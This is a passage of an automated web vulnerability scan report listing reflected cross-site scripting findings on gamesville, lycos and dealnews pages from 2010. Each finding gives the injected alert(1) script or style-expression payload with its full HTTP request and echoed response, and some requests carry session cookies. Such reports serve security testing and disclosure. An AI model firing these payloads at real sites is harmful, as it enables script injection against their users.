3.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2ca"><script>alert(1)</script>f7c5056a9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d2ca\"><script>alert(1)</script>f7c5056a9c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca"><script>alert(1)</script>f7c5056a9c8=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3110>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38975
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba0d"><script>alert(1)</script>f2dc20303b2 was submitted in the REST URL parameter 3. This input was echoed as 4ba0d\"><script>alert(1)</script>f2dc20303b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d"><script>alert(1)</script>f2dc20303b2 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29057
3.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40d3"><script>alert(1)</script>221b93386cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e40d3\"><script>alert(1)</script>221b93386cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3"><script>alert(1)</script>221b93386cc=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3114>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46248
3.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://classifieds.lycos.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb4"><script>alert(1)</script>b6c9dd0275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?16eb4"><script>alert(1)</script>b6c9dd0275a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?16eb4"><script>alert(1)</script>b6c9dd0275a=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be8c4<script>alert(1)</script>c1799e733f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=bn9ub373pc8q8p5g75cf8jgjion1rvnd; expires=Sun, 09-Jan-2011 14:27:24 GMT; path=/; domain=.dealnews.com
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=utf-8
<html><head><title>File Not Found</title> <style> body, td { font-family: Arial; font-size: 10pt; } a:link { color: #30309A; } a:visited { color: #1f2e62; } </style></head><body><div align="center" st ...[SNIP]... <p>The page you've requested, "http://dealnews.com/lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html", no longer exists or has moved to a new location. If you're unable to find what you were looking for, please contact the <a href="/contact.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be84f<script>alert(1)</script>75d2f5468e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html?2,414584,1328790,eref=lycos HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=9es4l9sjbia99svl89q5o3e327nsldmu; expires=Sun, 09-Jan-2011 14:27:27 GMT; path=/; domain=.dealnews.com
Content-Length: 1075
Connection: close
Content-Type: text/html; charset=utf-8
<html><head><title>File Not Found</title> <style> body, td { font-family: Arial; font-size: 10pt; } a:link { color: #30309A; } a:visited { color: #1f2e62; } </style></head><body><div align="center" st ...[SNIP]... <p>The page you've requested, "http://dealnews.com/lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html", no longer exists or has moved to a new location. If you're unable to find what you were looking for, please contact the <a href="/contact.html"> ...[SNIP]...
3.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656f6"style="x:expression(alert(1))"bdfcf5416e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coupons?656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&656f6"style="x:expression(alert(1))"bdfcf5416e5=1"> ...[SNIP]...
3.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bb70"style="x:expression(alert(1))"b6416fcc52e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals?9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals?pn=2&9bb70"style="x:expression(alert(1))"b6416fcc52e=1"> ...[SNIP]...
3.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/automotive-238
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff964"style="x:expression(alert(1))"467fcf726ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/automotive-238?ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&ff964"style="x:expression(alert(1))"467fcf726ca=1"> ...[SNIP]...
3.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/cameras-167
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0b4"style="x:expression(alert(1))"76383e47512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/cameras-167?2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&2e0b4"style="x:expression(alert(1))"76383e47512=1"> ...[SNIP]...
3.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/clothing-and-accessories-202
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c906"style="x:expression(alert(1))"2a42ce649cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/clothing-and-accessories-202?2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47737
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&2c906"style="x:expression(alert(1))"2a42ce649cd=1"> ...[SNIP]...
3.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/computer-39
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6c7a"style="x:expression(alert(1))"5a17236f13a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/computer-39?e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e6c7a"style="x:expression(alert(1))"5a17236f13a=1"> ...[SNIP]...
3.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/digital-cameras-168
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688cc"style="x:expression(alert(1))"fbe0d430e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/digital-cameras-168?688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&688cc"style="x:expression(alert(1))"fbe0d430e89=1"> ...[SNIP]...
3.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/electronics-142
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as daf23"style="x:expression(alert(1))"a3aefb6c21b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/electronics-142?daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&daf23"style="x:expression(alert(1))"a3aefb6c21b=1"> ...[SNIP]...
3.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/gaming-and-toys-186
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e037e"style="x:expression(alert(1))"f64d12d06a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/gaming-and-toys-186?e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e037e"style="x:expression(alert(1))"f64d12d06a2=1"> ...[SNIP]...
3.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/health-and-beauty-228
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b70e3"style="x:expression(alert(1))"c8c79da67d5 in the application's response.
